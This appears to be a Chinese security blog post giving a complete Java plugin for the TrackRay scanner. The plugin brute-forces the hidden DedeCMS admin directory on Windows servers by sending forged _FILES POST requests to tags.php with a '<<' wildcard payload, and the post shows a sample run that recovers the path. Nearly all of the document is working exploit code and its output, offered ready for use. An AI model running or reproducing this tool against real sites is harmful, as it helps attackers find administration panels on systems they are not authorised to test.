TrackRay插件
因为用了Windows的特性,所以只在Windows环境下有效。
@Rule(param = {"target"} , websocket = true )
@Plugin(title = "dedecms windows下后台暴力猜解" , author = "blue")
public class DedeFindManage extends WebSocketPlugin {
private String characters = "abcdefghijklmnopqrstuvwxyz0123456789_!#";
private String url;
@Override
public boolean check(Map param) {
url = param.get("target").toString();
return !param.isEmpty();
}
@Override
public Object start() {
boolean flag = false;
url = url.concat("/tags.php");
String prefix = "";
String payload = "./%s<</images/adminico.gif";
char[] chars = characters.toCharArray();
crawlerPage.getRequest().setUrl(url);
crawlerPage.getRequest().setHttpMethod(HttpMethod.POST);
Map params = new HashMap<String,String>();
params.put("_FILES[mochazz][tmp_name]","");
params.put("_FILES[mochazz][name]","0");
params.put("_FILES[mochazz][size]","0");
params.put("_FILES[mochazz][type]","image/gif");
crawlerPage.getRequest().setParamMap(params);
Fetcher fetcher = new Fetcher();
for (int i = 1; i <=7; i++) {
if (flag)
break;
ArrayList<String> list = new ArrayList<>();
permutation1(list,characters, "", i);
for (String str : list) {
send("testing:"+str);
params.put("_FILES[mochazz][tmp_name]",String.format(payload,str));
fetcher.run(crawlerPage);
String string = crawlerPage.getResponse().getStatus().getContentString();
if (!StringUtils.contains(string , "Upload filetype not allow") && crawlerPage.getResponse().getStatus().getStatusCode() == 200)
{
flag = true;
prefix = str;
break;
}
}
}
if (StringUtils.isNotBlank(prefix)){
send("prefix:"+prefix);
boolean f= false;
for (int i = 0; i < 30; i++) {
if (f)
break;
for (char c : chars) {
if (c == chars[chars.length-1])
f=true;
String s = String.valueOf(c);
params.put("_FILES[mochazz][tmp_name]",String.format(payload,prefix+s));
fetcher.run(crawlerPage);
String string = crawlerPage.getResponse().getStatus().getContentString();
if (!string.contains("Upload filetype not allow") && crawlerPage.getResponse().getStatus().getStatusCode() == 200)
{
prefix+= s;
send("[+]"+prefix);
break;
}
}
}
send("[+]后台地址为:"+prefix);
}
return prefix;
}
public void permutation1(ArrayList<String> list, String str, String result, int len){
if(result.length()==len){ //表示遍历完了一个全排列结果
list.add(result);
}
else{
for(int i=0;i<str.length();i++){
if(result.indexOf(str.charAt(i))<0){ //返回指定字符在此字符串中第一次出现处的索引。
//System.out.println("字母:"+str.charAt(i));
permutation1(list, str, result+str.charAt(i), len);
}
}
}
}
public static void main(String[] args) {
DedeFindManage dede = new DedeFindManage();
dede.setParam(new HashMap<String,Object>(){{
put("target","http://localhost/dede/");
}});
}
}
运行结果
testing:a
testing:b
testing:c
testing:d
testing:e
testing:f
testing:g
testing:h
testing:i
testing:j
testing:k
testing:l
testing:m
testing:n
testing:o
testing:p
testing:q
testing:r
testing:s
testing:t
testing:u
testing:v
testing:w
testing:x
testing:y
testing:z
testing:0
testing:1
testing:2
testing:3
testing:4
testing:5
testing:6
testing:7
testing:8
testing:9
testing:_
testing:!
testing:#
testing:ab
testing:ac
testing:ad
testing:ae
testing:af
testing:ag
testing:ah
testing:ai
testing:aj
testing:ak
testing:al
testing:am
testing:an
testing:ao
testing:ap
testing:aq
testing:ar
testing:as
testing:at
testing:au
testing:av
testing:aw
testing:ax
testing:ay
testing:az
testing:a0
testing:a1
testing:a2
testing:a3
testing:a4
testing:a5
testing:a6
testing:a7
testing:a8
testing:a9
testing:a_
testing:a!
testing:a#
testing:ba
testing:bc
testing:bd
testing:be
testing:bf
testing:bg
testing:bh
testing:bi
testing:bj
testing:bk
testing:bl
testing:bm
testing:bn
testing:bo
testing:bp
testing:bq
testing:br
testing:bs
testing:bt
testing:bu
testing:bv
testing:bw
testing:bx
testing:by
testing:bz
testing:b0
testing:b1
testing:b2
testing:b3
testing:b4
testing:b5
testing:b6
testing:b7
testing:b8
testing:b9
testing:b_
testing:b!
testing:b#
testing:ca
testing:cb
testing:cd
testing:ce
testing:cf
testing:cg
testing:ch
testing:ci
testing:cj
testing:ck
testing:cl
testing:cm
testing:cn
testing:co
testing:cp
testing:cq
testing:cr
testing:cs
testing:ct
testing:cu
testing:cv
testing:cw
testing:cx
testing:cy
testing:cz
testing:c0
testing:c1
testing:c2
testing:c3
testing:c4
testing:c5
testing:c6
testing:c7
testing:c8
testing:c9
testing:c_
testing:c!
testing:c#
testing:da
testing:db
testing:dc
testing:de
prefix:de
[+]ded
[+]dede
[+]后台地址为:dede
参考
https://xz.aliyun.com/t/2064
https://www.cnblogs.com/zhaijiahui/p/8484667.html